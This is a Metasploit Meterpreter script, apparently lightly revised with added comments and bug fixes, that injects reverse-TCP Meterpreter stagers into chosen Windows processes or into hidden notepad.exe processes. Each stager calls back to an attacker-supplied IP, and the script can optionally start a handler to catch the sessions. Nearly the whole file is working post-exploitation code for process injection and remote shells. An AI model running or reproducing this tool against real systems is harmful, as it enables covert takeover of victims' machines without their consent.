
multi_meter_inject.rb 5.2KB

  1. ##
  2. # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  3. # If you'd like to improve this script, please try to port it as a post
  4. # module instead. Thank you.
  5. ##
  6. # Author: Carlos Perez at carlos_perez[at]darkoperator.com
  7. #-------------------------------------------------------------------------------
  8. ################## Variable Declarations ##################
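# Script-level state. Meterpreter scripts run in the script object's binding,
# so `client` is the current session; it is also kept in @client because
# instance variables, unlike script locals, are visible inside the `def`s below.
@client = client

# Defaults for the options parsed in Main. Every address given with -I becomes
# the LHOST of its own stager, so there is no single listener address here;
# the port is shared by all stagers.
lport = 4444
multi_ip = nil
multi_pid = []
payload_type = "windows/meterpreter/reverse_tcp"
start_handler = nil
# The original also declared `lhost` (first set from
# Rex::Socket.source_address("1.2.3.4"), then immediately overwritten with
# "127.0.0.1") and `pid`; neither was ever read anywhere in the script, so the
# dead interface lookup and both unused locals are dropped.

@exec_opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ],
  "-p" => [ true, "The port on the remote host where Metasploit is listening (default: 4444)."],
  "-m" => [ false, "Start exploit/multi/handler for return connection."],
  "-P" => [ true, "Specify reverse connection Meterpreter payload. Default: windows/meterpreter/reverse_tcp"],
  "-I" => [ true, "Provide multiple IP addresses for connections separated by comma."],
  "-d" => [ true, "Provide multiple PID for connections separated by comma one per IP."]
)

# Platform string of the session; Main refuses anything but 'windows', since
# the default payload and the process-injection calls below are Windows ones.
meter_type = client.platform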
  27. ################## Function Declarations ##################
  28. # Usage Message Function
  29. #-------------------------------------------------------------------------------
  30. def usage
  31. print_line "Meterpreter script for injecting a reverce tcp Meterpreter payload"
  32. print_line "in to memory of multiple PIDs. If none is provided, a notepad process"
  33. print_line "will be created and a Meterpreter payload will be injected in to each."
  34. print_line(@exec_opts.usage)
  35. raise Rex::Script::Completed
  36. end
  37. # Wrong Meterpreter Version Message Function
  38. #-------------------------------------------------------------------------------
  39. def wrong_meter_version(meter = meter_type)
  40. print_error("#{meter} version of Meterpreter is not supported with this script!")
  41. raise Rex::Script::Completed
  42. end
# Function for injecting a payload into a given PID
  44. #-------------------------------------------------------------------------------
  45. def inject(target_pid, payload_to_inject)
  46. print_status("Injecting meterpreter into process ID #{target_pid}")
  47. begin
  48. host_process = @client.sys.process.open(target_pid.to_i, PROCESS_ALL_ACCESS)
  49. raw = payload_to_inject.generate
  50. mem = host_process.memory.allocate(raw.length + (raw.length % 1024))
  51. print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager")
  52. print_status("Writing the stager into memory...")
  53. host_process.memory.write(mem, raw)
  54. host_process.thread.create(mem, 0)
  55. print_good("Successfully injected Meterpreter in to process: #{target_pid}")
  56. rescue::Exception => e
  57. print_error("Failed to Inject payload to #{target_pid}!")
  58. print_error(e)
  59. end
  60. end
  61. # Function for creation of connection handler
  62. #-------------------------------------------------------------------------------
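# Start an exploit/multi/handler as a background job to catch the stagers'
# callbacks.
#
# @param payload_to_inject [Msf::Payload, String] either a configured payload
#   object -- its datastore (LHOST/LPORT) is shared with the handler -- or a
#   payload reference name such as "windows/meterpreter/reverse_tcp". The
#   original only handled the object form, but the script's -m path passes the
#   name, which raised NoMethodError on String#datastore; both forms are
#   accepted now. PAYLOAD is always stored as the reference name (refname),
#   which is what the datastore and exploit_simple expect.
# @return [Object] whatever exploit_simple returns for the job
#
# Caveats: with a bare name the listener's LHOST/LPORT are the module
# defaults, and ExitOnSession is true, so the job exits after the first
# session even though several stagers may call back.
def create_multi_handler(payload_to_inject)
  mul = @client.framework.exploits.create("multi/handler")
  if payload_to_inject.respond_to?(:datastore)
    mul.share_datastore(payload_to_inject.datastore)
    payload_name = payload_to_inject.refname
  else
    payload_name = payload_to_inject.to_s
  end
  mul.datastore['WORKSPACE'] = @client.workspace
  mul.datastore['PAYLOAD'] = payload_name
  mul.datastore['EXITFUNC'] = 'process'
  mul.datastore['ExitOnSession'] = true
  print_status("Running payload handler")
  mul.exploit_simple(
    'Payload' => mul.datastore['PAYLOAD'],
    'RunAsJob' => true
  )
end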
  76. # Function for creating the payload
  77. #-------------------------------------------------------------------------------
  78. def create_payload(payload_type,lhost,lport)
  79. print_status("Creating a reverse meterpreter stager: LHOST=#{lhost} LPORT=#{lport}")
  80. payload = payload_type
  81. pay = client.framework.payloads.create(payload)
  82. pay.datastore['LHOST'] = lhost
  83. pay.datastore['LPORT'] = lport
  84. return pay
  85. end
# Function for starting a hidden notepad.exe process to host a stager
  87. #-------------------------------------------------------------------------------
  88. def start_proc()
  89. print_good("Starting Notepad.exe to house Meterpreter session.")
  90. proc = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true })
  91. print_good("Process created with pid #{proc.pid}")
  92. return proc.pid
  93. end
  94. ################## Main ##################
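@exec_opts.parse(args) { |opt, _idx, val|
  case opt
  when "-h"
    usage
  when "-p"
    lport = val.to_i
  when "-m"
    start_handler = true
  when "-P"
    payload_type = val
  when "-I"
    multi_ip = val.split(",")
  when "-d"
    multi_pid = val.split(",")
  end
}

# Only Windows Meterpreters are supported (Windows payload, Windows process APIs).
wrong_meter_version(meter_type) if meter_type != 'windows'

# Validate the arguments before starting any job or touching any process.
# The original only checked for a missing -I; a -d list whose length differed
# from the -I list was silently ignored (the script fell through to spawning
# notepad processes), and -p accepted 0 or non-numeric values because to_i
# never fails.
if multi_ip.nil? || multi_ip.empty?
  print_error("You must provide at least one IP!")
  raise Rex::Script::Completed
end
unless lport.between?(1, 65535)
  print_error("Invalid port #{lport}: -p expects a value between 1 and 65535!")
  raise Rex::Script::Completed
end
if !multi_pid.empty? && multi_pid.length != multi_ip.length
  print_error("Provide one PID per IP: #{multi_ip.length} IP(s) but #{multi_pid.length} PID(s)!")
  raise Rex::Script::Completed
end

# Create an exploit/multi/handler if desired. It is handed the payload
# reference name (a String), so create_multi_handler must accept a name and
# not only a configured payload object.
create_multi_handler(payload_type) if start_handler

# One stager per IP: each gets its own LHOST, the port is shared. The pauses
# between injections are kept from the original.
if multi_pid.empty?
  # No PIDs given: spawn a fresh hidden notepad.exe as the host for each stager.
  multi_ip.each do |ip|
    inject(start_proc, create_payload(payload_type, ip, lport))
    select(nil, nil, nil, 2)
  end
else
  # PIDs given, one per IP (checked above).
  multi_ip.zip(multi_pid).each do |ip, target_pid|
    inject(target_pid, create_payload(payload_type, ip, lport))
    select(nil, nil, nil, 5)
  end
end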